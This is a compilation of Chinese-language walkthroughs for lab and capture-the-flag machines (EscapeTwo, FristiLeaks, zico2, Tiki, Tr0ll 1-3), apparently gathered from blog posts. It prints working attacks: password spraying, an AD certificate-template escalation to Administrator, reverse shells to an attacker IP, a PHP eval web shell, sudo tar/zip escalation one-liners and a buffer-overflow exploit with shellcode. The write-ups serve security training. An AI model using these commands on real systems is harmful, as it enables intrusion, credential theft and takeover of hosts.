HTB-EscapeTwo HTB：EscapeTwo已有信息为rose/KxEPkKe6R8su我们使用nmap进行端口扫描nmap -sT -p- -T5 -A -Pn 10.10.11.51Tips：如果发现端口扫描的慢的话，要用代理比如小猫，kali代理到小猫的那个端口，修改proxychAIns的配置文件 /etc/proxychAIns4.conf 然后 proxychAIns openvpn lab_xxxxx.ovpn 挂到后台就行修改hostsecho "10.10.11.51 sequel.htb" | sudo tee -a /etc/hosts尝试一个基本的smb枚举（已知信息），看看是否能登录成功┌──(root㉿kali)-[/data/demo] └─# crackmapexec smb sequel.htb -u rose -p KxEPkKe6R8su --computers SMB sequel.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domAIn:sequel.htb) (signing:True) (SMBv1:False) SMB sequel.htb 445 DC01 [+] sequel.htbrose:KxEPkKe6R8su SMB sequel.htb 445 DC01 [+] Enumerated domAIn computer(s) SMB sequel.htb 445 DC01 sequel.htbDC01$枚举smb服务器共享信息smbmap -u 'rose' -p 'KxEPkKe6R8su' -H 10.10.11.51使用smbclient登录┌──(root㉿kali)-[/data/demo] └─# smbclient //sequel.htb/Users -U sequel.htb\rose Password for [SEQUEL.HTBrose]: Try "help" to get a list of possible commands. smb: > dir . DR 0 Sun Jun 9 09:42:11 2024 .. DR 0 Sun Jun 9 09:42:11 2024 Default DHR 0 Sun Jun 9 07:17:29 2024 desktop.ini AHS 174 Sat Sep 15 03:16:48 2018 6367231 blocks of size 4096. 880750 blocks avAIlable smb: > ┌──(root㉿kali)-[~] └─# smbclient //sequel.htb/'Accounting Department' -U sequel.htb\rose Password for [SEQUEL.HTBrose]: Try "help" to get a list of possible commands. smb: > dir . D 0 Sun Jun 9 06:52:21 2024 .. D 0 Sun Jun 9 06:52:21 2024 accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024 accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024 6367231 blocks of size 4096. 871029 blocks avAIlable smb: >参数解释smbclient : 这是一个用于与SMB/CIFS（Common Internet File System）服务器进行交互的命令行工具。它可以用来浏览共享资源、上传/下载文件等操作。//sequel.htb/Users : // 这是目标SMB共享的起始路径，sequel.htb是目标主机的域名或IP地址，Users 是共享资源的名称，通常表示存储用户文件的共享文件夹。-U sequel.htb\rose : -U参数用于指定连接时使用的用户名，sequel.htb工作组/域，rose具体的用户名执行该命令后，系统通常会提示输入 rose 用户的密码。输入正确的密码后，用户将能够访问 Users 共享中的文件和目录，类似于在文件资源管理器中访问网络共享。我们登录到Accounting Department这个smb服务器的时候发现了两个xlsx表格文件，我们尝试将这个文件下载下来我们使用get命令下载这两个文件此时得到了密码信息angela/0fwz7Q4mSpurIt99 oscar/86LxLBMgEWaKUnBG kevin/Md9Wlq1E5bZnVDVo sa/MSSQLP@ssw0rd!有一个sa账户，像是mssql的用户名和密码，并且1433端口也是开启的（待会会用上）我们将上面的密码保存到一个txt文件中，枚举域内用户echo '0fwz7Q4mSpurIt99 86LxLBMgEWaKUnBG Md9Wlq1E5bZnVDVo MSSQLP@ssw0rd!' > pass.txt netexec ldap 10.10.11.51 -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users将用户名保存到user.txtAdministrator Guest krbtgt michael ryan oscar sql_svc rose ca_svc此时你的目录下面有这四个文件┌──(root㉿kali)-[/data/demo] └─# ls accounting_2024.xlsx accounts.xlsx pass.txt user.txt就接下来使用密码喷洒得到账号密码信息oscar 86LxLBMgEWaKUnBG通过 WinRM（Windows Remote Management）协议对目标主机 10.10.11.51 进行身份验证nxc winrm 10.10.11.51 -u 'oscar' -p '86LxLBMgEWaKUnBG'利用mssql执行系统命令netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'whoami'利用dir进行目录遍历，发现一个sql2019，应该是mssql的目录netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:/'继续遍历netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'发现一个sql-Configuration.INI文件netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'dir c:SQL2019ExpressAdv_ENU'查看文件内容netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -X 'type c:SQL2019ExpressAdv_ENUsql-Configuration.INI'发现两个东西SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSVCACCOUNT="SEQUELsql_svc"参数介绍SQLSVCACCOUNT表示 SQL Server 服务将在一个名为 sql_svc 的域账户下运行。SQLSVCPASSWORD 是 SQLSVCACCOUNT 账户的密码再次进行密码喷洒 netexec mssql 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success得出两个凭证，测试哪个能利用winrm进行登录netexec winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' --continue-on-success得出一个结果ryan用户能使用远程登录evil-winrm -i 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3'切换到ryan的桌面，找到第一个flag提权域内信息收集使用netexec枚举靶机域内信息netexec ldap 10.10.11.51 -d sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' --dns-server 10.10.11.51 --bloodhound -c Allbloodhound用于分析和可视化域内的用户、组、计算机、权限关系等数据，帮助安全研究人员或攻击者快速发现攻击路径和权限提升机会。下载由图标可见，ryan用户对ca_svc用户具有WriteOwner权限查看ca_svc用户信息net user ca_svc /domAIn由输出可见，该用户属于Cert Publishers组使用bloodyAD将ca_syc用户拥有者修改为ryan用户┌──(root㉿kali)-[/data/windows_atk/script] └─# bloodyAD -d sequel.htb --dc-ip 10.10.11.51 --dns 10.10.11.51 -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan' [+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc使用 ryan 的凭据将 AD 对象 ca_svc 的所有者权限转移给 ryan，是典型的权限提升或后渗透操作。成功执行后，攻击者可完全控制 ca_svc 账户，进一步渗透域环境。这里如果失败的话呢，需要重置一下机器，因为可能是别人打过的┌──(root㉿kali)-[/data/windows_atk/script] └─# python dacledit.py -action 'write' -principal 'ryan' -target 'ca_svc' 'sequel.htb/ryan:WqSZAF6CysDQbGb3' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20250309-193835.bak [*] DACL modified successfully!将本地时钟与靶机同步sudo ntpdate 10.10.11.51使用certipy-ad创建ca_svc用户影子证书，获得该用户NTLM密码哈希certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -target sequel.htb -dc-ip 10.10.11.51 -ns 10.10.11.51账号：ca_svc密码hash：3b181b914e7a9d5508ea1e20bc2b7fcegit clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git cd .Ghostpack-CompiledBinaries upload Certify.exe .Certify.exe find /domAIn:sequel.htb由输出可见，该模板对DomAIn Admins具有注册权利，而且Cert Publishers对该模板具有完全控制权限，因此恶意利用该模板即可获取管理员密码哈希使用certipy-ad通过ca_svc哈希密码枚举靶机ADCS尝试发现该漏洞┌──(root㉿kali)-[/data/windows_atk/script] └─# certipy-ad find -u ca_svc@10.10.11.51 -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP [*] Got CA configuration for 'sequel-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : sequel-DC01-CA DNS Name : DC01.sequel.htb Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3 Certificate Validity Start : 2024-06-08 16:50:40+00:00 Certificate Validity End : 2124-06-08 17:00:40+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : SEQUEL.HTBAdministrators Access Rights ManageCertificates : SEQUEL.HTBAdministrators SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins ManageCa : SEQUEL.HTBAdministrators SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins Enroll : SEQUEL.HTBAuthenticated Users Certificate Templates 0 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireCommonName SubjectAltRequireDns Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins Object Control Permissions Owner : SEQUEL.HTBEnterprise Admins Full Control Principals : SEQUEL.HTBCert Publishers Write Owner Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers Write Dacl Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers Write Property Principals : SEQUEL.HTBDomain Admins SEQUEL.HTBEnterprise Admins SEQUEL.HTBAdministrator SEQUEL.HTBCert Publishers [!] Vulnerabilities ESC4 : 'SEQUEL.HTB\Cert Publishers' has dangerous permissions由末尾输出可见，利用该模板可导致ESC4漏洞攻击certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -k -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.10.11.51 -debug使用certipy-ad请求一份Administrator用户符合模板要求的证书certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -dc-ip 10.10.11.51使用certipy-ad借助pfx证书通过身份认证，使用impacket-psexec通过上述哈希凭证登录靶机certipy-ad auth -pfx administrator_10.pfx impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff'C:UsersAdministratorDesktop 找到root.txt文件C:UsersAdministratorDesktop> type root.txt 6ca10bc95839bb3243539e3d7ea4f362至此，靶机渗透结束往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细

FristiLeaks1.3-提权靶机渗透 清者自清链接：https://www.vulnhub.com/entry/fristileaks-13,133/作者：Ar0xA难度：中等主机发现，以及快速的80探测全端口syn扫描nmap -sS 192.168.111.153 -T4 -p- -A爬虫协议这个界面似曾相识啊，就是上面那些url，一个路径下面有一个图片，这不就是Tr0ll系列的内容嘛？那个FTP匿名登录的。这张图告诉我们说，This is not the url，不是这个url，貌似是想要我们找URL信息分析源码，从这个图片标签中，就能分析出网站根目录中都对应着一个图片查看这个图片的上级目录，没有利用信息首页源码wappalyzer信息那么只剩下首页那几个大字了找到上面那张图的最后一个单词，fristi打靶机的时候，一定要第一时间查看源码！这里有一个base64编码信息这里可以看到是一个png的文件头，说明是一个png文件将他重定向为一个png文件密码信息KeKkeKKeKKeKkEkkEk，但是没有用户啊继续查看源码，eezeepz此时得到了账号密码登录成功让我们选择一个图片文件随意上传，Only allowed are: png,jpg,gif，限制了png，jpg，gif格式抓包改格式，还是上传失败的看这里，有一个apache中间件利用这个apache中间件的解析漏洞，他不是一个编号漏洞，而是配置不当，具体描述如下访问成功连接即可反弹shell/bin/bash -i >& /dev/tcp/192.168.111.128/6666 0>&1创建一个交互式终端python -c 'import pty; pty.spawn("/bin/bash")'从当前网站根目录开始信息收集，既然涉及到了登录，那么大概率用到了数据库，检查一下checklogin.php账号密码：eezeepz / 4ll3maal12#目前也就只有这一条信息eezeepz 用户存在，使用数据库的密码尝试登录，失败了其他信息收集bash-4.1$ uname -a Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux bash-4.1$ lsb_release lsb_release bash: lsb_release: command not found bash-4.1$ cat /etc/os-release cat /etc/os-release cat: /etc/os-release: No such file or directory bash-4.1$ find / -perm -4000 -print 2>/dev/null find / -perm -4000 -print 2>/dev/null /bin/mount /bin/fusermount /bin/umount /bin/su /bin/ping /bin/ping6 /sbin/pam_timestamp_check /sbin/unix_chkpwd /usr/bin/crontab /usr/bin/chsh /usr/bin/sudo /usr/bin/chfn /usr/bin/newgrp /usr/bin/chage /usr/bin/gpasswd /usr/bin/passwd /usr/libexec/openssh/ssh-keysign /usr/libexec/pt_chown /usr/sbin/suexec /usr/sbin/usernetctl直到回家的路上，看到一个jerry写的txt文件，似乎是让我们清理掉eezeepz的homehey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry很多的命令，但是有也包含了一个txt文件查看内容意思大致就是说，需要将 /usr/bin/* 目录下的文件夹中复制到我home下面，来自/home/admin/下面这段话，应该是说让我们建立一个计划任务，每分钟以我的用户（admin）进行运行根据上面的提示，让我们放入一个runthis文件，而这个文件，类似/etc/crontab（计划任务）文件，在这里是以admin用户定时执行任务，所以我们的思路是可以利用这个漏洞拿到admin的shell开启一个微型的http服务python -m http.serverTips ：wget的时候，不添加http等关键字也可以wget 192.168.111.128:8000/py_shell_release.py方法一：echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > runthis这个时候也能直接查看admin目录下面的文件信息了，越权成功方法二：echo '/usr/bin/python /tmp/py_shell_release.py' > runthis此时就可以直接断开连接了，然后nc监听就行（耐心等待一会儿），反弹成功，获取到admin用户的权限创建交互式终端，查看这两个txt文件python -c 'import pty; pty.spawn("/bin/bash")'不清楚上面是什么加密的话，可以查看当前目录下面的一个py文件，包含了这个加密的信息，通过这些代码，就可以写出解码的代码解码的代码参考import base64,codecs,sys def decodeString(str): base64string= codecs.decode(str,'rot13') return base64.b64decode(base64string[::-1]) cryptoResult=decodeString(sys.argv[1]) print cryptoResult第一个结果：LetThereBeFristi!第二个结果：thisisalsopw123切换一个用户看看，成功一个去到当前用户的根目录，~，有一个suid文件sudo -l 也是这个文件，有了suid还能sudo不知道文件怎么用？history，继续信息收集发现能够以root身份执行命令 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash那么使用 /bin/bash 试试，提权成功。如果/bin/bash不成功，还可以试试反弹shell往期推荐【oscp】WEBDEVELOPER，tcpdump提权【oscp】tar、zip命令提权—zico2【oscp】稀有靶机-Readme【oscp】Hackme【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【oscp】Node

tar、zip命令提权—zico2 【OSCP】tar、zip命令提权—zico2本次靶机为zico2，OSCP类型的主要利用的是tar命令和zip命令的提权下载链接：https://download.vulnhub.com/zico/zico2.ova主机发现 && 80探测nmap全端口扫描dirb目录扫描标题包含的版本信息漏洞检索，此版本有一个远程命令执行漏洞查看内容根据提示来输入admin密码后，进入后台编写一个poc.php记好了这个“数据库”（一句话木马的php文件）的绝对路径 /usr/databases/poc.php填写名称和字段数写好我们的payload <?php @eval($_POST[cmd])?>看到提示说明我们创建成功了github上是让我们复制一个文件到根目录就可以了，但是我们没有命令执行继续信息收集，一句话木马已经上传成功了点着点着也就发现这个可能存在漏洞点这个，不就是文件包含嘛，试试普通的文件包含，利用成功有了文件包含，还有我们的脚本文件的路径，那么就有思路了，包含我们的“数据库”/usr/databases/poc.phpkali开启监听，准备反弹shell反弹shell（其他的都不行）rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f成功创建交互式终端python -c "import pty; pty.spawn('/bin/bash');"内网信息收集，低版本的ubuntu系统，首先想到的就是内核提权漏洞检索提权失败继续信息收集joomla内容管理系统的配置文件中，FBVtggIk5lAzEU9H，利用su切换zico用户，失败wordpress内容管理系统的配置文件，切换用户成功有了密码，就可以利用sudo了，可以看到这个用户是可以利用sudo进行提权的，要用到tar命令或者zip找找suid文件那么就利用tar命令提权了 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shzip+sudo提权TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #'往期推荐【OSCP】靶机-election【OSCP】sudo的上级目录提权，靶机SkyTower【OSCP】稀有靶机-Readme【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！

Tiki提权靶机渗透 【OSCP】Tiki提权靶机渗透下载链接：https://www.vulnhub.com/entry/tiki_1,525/做题一定要先看题目，提示我们有一个CVE漏洞哦，不，我们的网络服务器被入侵了。攻击者使用的是Oday，所以我们不知道他是如何进入管理面板的。调查。 这是一个OSCP准备盒，是基于我最近发现的一个CVE。它在OSCP实验室机器级别。 如果你需要提示联系我在Twitter上：S1lky_1337，应该在VirtualBox和Vmware上工作。arp-scan -l 主机发现和端口扫描访问80端口直接上信息收集插件Wappalyzer内容管理系统漏洞检索，但是不清楚版本信息查看源代码直接搜索相关的版本关键字（没有什么东西）再找找和官网url相关的信息（有些cms应用在跳转链接的时候呢会加上版本信息）目录扫描出来一个文件，泄露了版本信息dirsearch -u http://10.10.10.196/tiki那么直接返回来看漏洞信息，选择那个21版本的searchsploit -m 48927告诉我们管理员密码被删除，使用burpsuite可以直接登录成功，那么它的登录框在哪呢Admin Password got removed. Use BurpSuite to login into admin without a password从目录扫描的结果中可以看到，但是没有权限后面又看了看主页。。。尝试登录的时候我们要把pass删除再发送请求，这样就能直接登录成功（漏洞脚本提示），也可以直接用burpsuite，原理都是一样的这儿有一个文件上传上传一句话木马这个能看到页面源码尝试连接，失败查看所有修改过的页面有一对账号密码silky:Agy8Y7SPJNXQzqAssh登录成功有了密码直接sudo，发现所有文件都能sudo，那么sudo -i至此提权成功！往期推荐红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎！媲美DeepSeek，附源码【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入（sql十大注入类型）：技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细

Tr0ll系列提权教程，Tr0ll 靶机全系列（1-3） Tr0ll 靶机全系列（1-3）Tr0ll level 1本文主要是利用了ftp匿名登录允许匿名登录再看看网页的东西插件看到一个phpmyadmin数据库管理器但是目录扫描的结果中没有任何phpmyadmin相关的东西只有这两个撒比图片还有一个robots.txt那么只能使用刚刚nmap扫描出来的ftp匿名登录了，密码为空即可登录目标ftp服务器有一个lol.pcap流量包，我们使用大鲨鱼打开看看，下面是ftp下载的命令用大鲨鱼打开，赛选ftp的协议，可以看到登录ftp的账号密码 anonymous / password流量分析这里服务器使用了syst命令，查看系统信息215 ：这是一个状态码，表示请求成功。UNIX Type：L8 ：这是服务器的操作系统类型PORT 10,0,0,12,173,198 （让服务端连接客户端的44486端口）为什么是44486端口？先观察这6位数，前四个和ip地址很像，说明这就是IP地址，实际的数据交互的端口应该是后面两个数构成。这里是用第五个数乘以256 再加上第六个数，这时候就得到了实际的端口号（173x256+198=44486）响应结果为 command successful. Consider using PASV.继续分析命令 LIST （命令用于列出指定目录中的子目录和文件信息，如果没有指定目录的名字就默认列出当前目录下的所有子目录和文件信息，并返回给客户端。），红框中是返回结果，是有一个文件的命令：TYPE I (I 文件传输类型为二进制 ; A 文件传输类型为ASCII) 返回结果： Switching to Binary mode.和刚刚一样的命令：PORT 10,0,0,12,202,172 （客户端请求服务端，让服务端连接客户端51884端口） 返回值：PORT command successful. Consider using PASV.命令：RETR secret_stuff.txt （下载secret_stuff.txt） 返回值：Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER! 好吧，好吧，好吧，你不就是个聪明的小恶魔吗，你差点就找到了sup3rs3cr3tdirlol:-P 太糟糕了，你离得太近了……要更加努力!再自己找找，找到网页上来了，这里有一个二进制文件下载下来看看让我们找到这个 0x0856BF 这个地址，继续Find address 0x0856BF to proceedgood_luck文件夹中this_folder_contAIns_the_password文件夹我们使用海德拉爆破，这里很奇葩，密码为 Pass.txt 密码文件名称就是ssh的密码，指定密码文件那个笑脸，都是错误的切换终端，收集内核信息，ubuntu版本很低，很大可能存在内核提权漏洞符合条件的两个，一个是c文件把他复制到当前目录下，尝试编译，本地不行，放到靶机上去提权成功防止ftp匿名登录在 FTP 服务器（如 vsFTPd、ProFTPD 等）上配置匿名登录通常涉及以下步骤： 编辑配置文件：找到 FTP 服务器的配置文件（例如 /etc/vsftpd.conf）。 启用匿名访问：确保以下配置项被设置为拒绝匿名访问： plAIntext anonymous_enable=NO 设置匿名用户的根目录：指定匿名用户可以访问的目录：plAIntextanon_root=/path/to/anonymous/directory ``` 重启 FTP 服务：保存配置后，重启 FTP 服务以使更改生效：sudo systemctl restart vsftpd level 2主机发现，80探测端口syn扫描，没有啥利用信息了和上一关一样，使用ftp匿名登录试试，失败目录扫描访问robots.txtnoob，keep_trying，dont_bother，ok_this_is_it都是这个母老虎源码What did you really think to find here? Try Harder!，这几个母老虎的源码都是这个提示返回主页，查看源码登录失败普通ftp用户不行，那就换作者的Tr0ll，账号密码都是Tr0ll目录枚举，下载下来尝试各种方法后，也找不到这个密码那么只剩下一个方法了，从这两个图片入手下载就行这里下载的是这张图片这张图片啥也没有仔细分析图片的路径就能清楚了然后根据robots的路径，找到如下图片http://192.168.111.191/dont_bother/cat_the_troll.jpg最终找到一个消息Look Deep within y0ur_self for the answer（从 y0ur_self 处寻找答案），回到网页泄露了一个密码字典爆破（apt install fcrackzip）失败的，就不等了看样子是base64的一个编码，我们去解码一下用base -d解码这个文件，并重定向到pass.txt中然后再爆破，找到了zip的密码ItCantReallyBeThisEasyRightLOL一个ssh密匙，RSA有了密匙，就可以登录服务器了，不支持互相签名（就是不让你登录）提示了sign_and_send_pubkey: no mutual signature supported，表示SSH连接时，客户端和服务器之间无法就公钥认证使用的签名算法达成一致。此时我们要加上一个 -o 参数ssh -i noob -o "PubkeyAcceptedKeyTypes=ssh-rsa" noob@192.168.111.191不让登录，平时的利用方式就没有了，这里有一个shellshock env环境变量绕过ssh的漏洞Shellshock，又称Bashdoor，是Unix中广泛使用的BashShell中的一个安全漏洞，首次于2014年9月24日公开。shellshock Bash漏洞利用CVE-2014-6271被利用！关键字Shellshock，Remote（远程）因为我们有了私匙，只能进行远程的漏洞利用第一个payload，这是一个正反向连接的payload，看到一个SSH-2.0，，，，，目前收集到的信息，大概率不是这个搜第二个，msf的脚本貌似是可以执行命令的这时候可以利用ssh执行命令测试成功了，内网信息收集，低版本的系统筛选出了这个结果使用方法我们的靶机，一个23，一个29，很明显，不适用已经替你们试过了查找指定用户的文件，也没有利用方式回家的路SUIDsuid提权一个个找呗（啥利用方式也没有）有这些东西切换根目录看到三个门第一个门，自动重启了。。。。。两分钟的困难模式，就是不让我输入命令了，把我给锁了两分钟。。。。查看信息，三个门都是root的文件这里要用到一个工具GDB，全名叫做（GNU Debugger）是一个强大的开源调试器，主要用于调试编写在 C、C++、Fortran 等编程语言中的程序。显示给定函数（mAIn）的反汇编代码，mAIn函数一般是一个程序中的主函数disas mAIn door3door2door1发现了第二个door可能存在缓冲区溢出的漏洞，strcpy 函数详细这里我们要用到msf自带的插件了，生成1024个字符（也可以不是1024，500，100都可以），用于测试程序是否存在缓冲区溢出漏洞cd /usr/share/metasploit-framework/tools/exploit ./pattern_create.rb -l 1024在gdb中执行r00t文件，我们可以看到缓冲区溢出在 0x6a413969 这个位置run 你生成的1024个字符Program received signal SIGSEGV, Segmentation fault. 程序接收到SIGSEGV信号，出现了分段故障，存在漏洞使用msf的pattern_offset.rb反查 6a413969 对应上面的字符中的偏移量，为268查找ESP栈的溢出地址，有了偏移量，就可以知道栈空间大小占据空间位置，接下来就要找跳板地址ESP，就可以跳到恶意代码shellcode的位置跳板地址：攻击者会在溢出数据后添加返回地址（即跳板地址），希望程序在执行到这条返回指令时能跳转到覆盖的恶意代码位置，从而执行攻击者的代码。print 写入 268 个A和4个B问：为什么是 4 个 B 而不是 2 个或 6 个？因为返回地址在 x86 上通常是 4 字节，使用 4 个字符（B）正好填满这一字节，每个 B 对应一个字节。如果只使用 2 个 B（即 2 字节），返回地址将没有被完全覆盖。而使用6个，会多于所需的字节数，但仍会覆盖返回地址。不过，这样的做法没有必要，因为多余的 B 不会提供任何额外的好处，只是冗余。r $(python -c 'print "A"*268 + "B"*4') # 在GDB调试工具中 r表示启动调试当前程序 info r # 分析程序调试过程中的状态，在检查程序崩溃、调试函数调用及访问变量时，经常使用，前面已经有一个错误Program received signal SIGSEGV, Segmentation fault.，所以可以直接使用info r查看寄存器状态起始的 esp 内容在生成的字符后面再添加几个字符，执行以后看一下缓冲区溢出的 esp 内容返回了一个新的地址结论：我们要构造268个字符偏移量，将esp位置放在268个字符之后，这样esp位置就存在了返回的栈里，并在esp字符之后加入shellcode，这样完成了对缓冲区溢出的利用。python代码将 0xbffffb80 起始的esp地址转化为十六进制字节序列的形式address = 0xbffffb80 byte_sequence = address.to_bytes(4, byteorder='little') hex_representation = ''.join(f'\x{byte:02x}' for byte in byte_sequence) print(hex_representation) # x80xfbxffxbf查看内核信息x86系统如果输出是 x86_64，则表示你在使用 64 位系统（x64）。如果输出是 i686 或 i386，则表示你在使用 32 位系统（x86）。Shell-Storm 搜索关键字获取shellcode，x86 - execvehttps://shell-storm.org/shellcode/index.htmlexecve：表示可执行文件的意思然后我们需要的是shellcode，所以关键字就是，execve、x86、shellcode，就能定位到这个，中间的哪个表示需要执行的命令也就是获取一个shell这下就能组成一个payload了./r00t $(python -c 'print "A"*偏移量 + "esp起始地址" + "nop sled"*20 + "shellcode"') ./r00t $(python -c 'print "A"*268 + "x80xfbxffxbf" + "x90"*20 + "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"')nop sled 是一种可以破解栈随机化的缓冲区溢出攻击方式栈随机化指运行时栈的起始地址为随机的，所以我们存放shellcode的esp的地址也会发生对应的改变在shellcode前注入很长的 nop（x90） 指令 （无操作，仅使程序计数器加一）序列，程序计数器逐步加一，直到到达攻击代码的存在的地址提权成功另外这个esp起始地址一定是要固定不变的吗？我们把他修改为返回后的esp地址也就是0xbffffb50，之前是0xbffffb80，上python代码（这个脚本可以保存好，经常要用）address = 0xbffffb80 byte_sequence = address.to_bytes(4, byteorder='little') hex_representation = ''.join(f'\x{byte:02x}' for byte in byte_sequence) print(hex_representation) # x50xfbxffxbf而我修改了这个nop sled数量为400个，照样也是可以提权的./r00t $(python -c 'print "A"*偏移量 + "esp其他地址" + "nop sled"*400 + "shellcode"') ./r00t $(python -c 'print "A"*268 + "x50xfbxffxbf" + "x90"*400 + "xbax19xb3xb8x79xdbxdexd9x74x24xf4x5dx29xc9xb1x0bx31x55x15x83xedxfcx03x55x11xe2xecxd9xb3x21x97x4cxa2xb9x8ax13xa3xddxbcxfcxc0x49x3cx6bx08xe8x55x05xdfx0fxf7x31xd7xcfxf7xc1xc7xadx9exafx38x41x08x30x10xf6x41xd1x53x78"')这个案例就证明只要nop sled枚举的地址足够多，成功几率还是很大的，接下来是level 3level 3主机发现，直接连接就行了，start:heresuid常规信息收集sudo0777文件：表示一个文件或目录完全开放，任何用户都可以读取、修改和执行它。find / -type f -perm 0777 2>/dev/null这里有一个cap文件（可以用wireshark工具打开），这不是常规的数据包，802.11跟无线协议的关系很大这像是一个字典把他用上这里要用到一个工具 AIrcrack-ng，AIrcrack-ng ：是一个用于无线网络安全审计的开源工具套件，专门用于评估和测试 Wi-Fi 网络的安全性。它广泛用于网络安全研究、渗透测试和网络监控。该工具套件包括一系列功能强大的工具，可以帮助用户捕获流量、破解 WEP 和 WPA/WPA2 密码、以及进行网络攻击等。爆破密码试试Tips：有Wi-Fi网络的握手数据包，就可以在离线情况下进行密码破解，无需与你的设备直接连接该网络。AIrcrack-ng -w gold_star.txt wytshadow.cap有了文件名称和密码gaUoCe34t1，去看看有没有这个用户wytshadow密码正确继续信息收集，可以看到有一个nginx的服务文件可以用sudo 